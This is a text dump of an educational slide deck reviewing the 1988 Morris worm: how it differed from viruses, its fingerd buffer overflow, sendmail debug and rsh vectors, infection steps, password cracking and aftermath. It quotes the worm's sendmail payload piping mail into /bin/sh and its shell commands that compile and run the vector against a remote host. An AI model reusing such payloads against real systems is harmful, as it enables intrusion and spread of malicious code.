crisis and aftermath
DESCRIPTION
Crisis And Aftermath. Reviewed by Yunkyu Sung [email protected]. Contents. Introduction Worm vs. Virus Worm History example How the worm operated Crisis Aftermath. Worm vs. Virus. Worm History. 1975 John Brunner’s Science fiction 1981 Xerox PARC experimented 1988 Worm Started * - PowerPoint PPT PresentationTRANSCRIPT
Crisis And Aftermath
Reviewed by Yunkyu [email protected]
Contents
IntroductionWorm vs. VirusWorm History
example
How the worm operatedCrisisAftermath
Worm vs. Virus
Worm VirusCan run independently? Yes No
How this operated? Consume the resource of its host
Insert itself into a host’s some program
When invoked? Itself When infected program is running
Worm History
1975 John Brunner’s Science fiction1981 Xerox PARC experimented 1988 Worm Started*
…2003 SQL Slammer worm (1.25 인터넷대란 )
03’ 1.25 인터넷 대란
2003 년 1 월 25 일 Microsoft SQL server를 대상으로 하는 slammer worm 활동404bytes 를 1434/udp (SQL Server Resolution Service Port) 로 전송
finger
finger : allows user to obtain information about other user over TPC/IPCommon Unix systems run a demon of finger (fing
erd)The worm broke fingerd program by “buffer overru
n” The worm exploited gets() call
finger
Example)
in gets(), we set a buffer as 10. (ex. char buff[10]; )
Type over 11 characters buffer overflow
When buffer overflow error occurred,Normal cases : core dumped and exitBut, the worm : overwriting stack info and
causes returning to worm program code. So worm can run alone.
sendmail
sendmail is mailer program to route mail in a heterogeneous network.
By debug option, tester can run programs to display the state of the mail system without sending mail or establishing a separate login connection.
Worm use debug option to invoke set of commands instead of user address
password
Password mechanism in UNIX system1. Insert password2. “Encryption standard algorithm” encrypted3. Compare with Previously encrypted
password4. If it is same, we get a accessibility
Trusted logins to avoid having to repeatedly type Passwords
rlogin runs without password checking
How worm operated
Main Program : collect information on other machines in the network
Vector Program : try to infect other machines with information obtained
How worm operated (cont’d)
How it works1. Connect to target2. Transfer source code of each part3. Compile it4. Run it5. Collect information 6. Try to connect to other machines
Step 1, 2 : Connection & Send
1. A socket established between vector and infecting machine
2. Vector tries one of two methods1. Using TCP connection to /bin/sh2. Using SMTP
Step 2 : Connection (cont’d)
echo ….. > x14481910.c[text of vector..]
DebugMain from: </dev/null>rcpt to: <“|sed –e ‘1,/^$/’d | /bin/sh ; exit 0” > data cd /usr/tmp cat > x14481910.c << ‘EOF’ [text of vector ..] EOF
cc –o x14481910 x14481910.c./x1448190 128.32.134.16 32341 8712440rm –f x14481910 x14481910.cquit
Step 3 : file transfer
Vector connected to the ‘server’Transfer 3 files
Sun3, VAX binary version of worm Source code of Vector
Vector became a shell with its input, output still connected to the serverUsing execl
Step 4 : Infect Host
Server sent the command streamto the connected shellPATH=/bin:/usr/bin:/usr/ucbrm –f shif [ -f sh ]then p=x1448190else p=shfi
Then for each binarycc –o $P x14481910,sun3.o./$P –p $$ x14481910,sun3.o x14481910,vax.o x14481910,11.crm –f $P
Step 5 : Hide Worm
New worm hides itselfObscuring its argument vectorUnlinking the binary version of itselfKilling its parentRead worm binary into memory and
encryptAnd delete file from disk
Step 6 : Information gathering
The worm gathers information aboutNetwork interfaceHosts to which the local machines was connected
Using ioctl, netstat
It built lists of these in memory
Step 7 : reachability
Connected status Directly connected? Host type? (gateway or local host)
Try to connect using telnet, rexec
Step 8 : Infection Attempts
Attack via rsh /usr/bin/rsh, /bin/rsh
Can be used without password checking If successful, go to step 1 and step 2.1
Finger Stack overflow attacking Return stack frame for main routing changed to execve(“/bi
n/sh”, 0 , 0)If successful, go to step 1 and step 2.1
Connection to SMTP Step 2.2
Step 9 : infected machine information
1. Collect info/etc/hosts.equiv and /.rhosts/etc/passwd.forward
2. Cracking passwd using simple choices3. Cracking passwd with an internal dictionary of word
s4. Cracking passwd with /usr/dict/words5. Loop forever trying to infect hosts in its internal tab
les
Step 10
Break into remote machinesRead .forward , .rhosts for user accounts
Create the remote shellRemote rexec servicerexec to the current host
rsh to the remote host .rhosts or host.equiv file on remote server
Characteristics
Check for other worms runningOne of 7 worms become immortalFork itself and kill parentRe-infect the same machine every 12 hoursThere are no stop code
Aftermath
First wormAround 6000 major UNIX machines were infected ( 10% of the network at that time)Important nation-wide gateways were shutdownTopic debatedpunishment
Then …
Robert T. Morris arrestedHe just want to make a tool to gauge the size of the internet3 years probation, fine, community service
Computer Emergency Response Team was established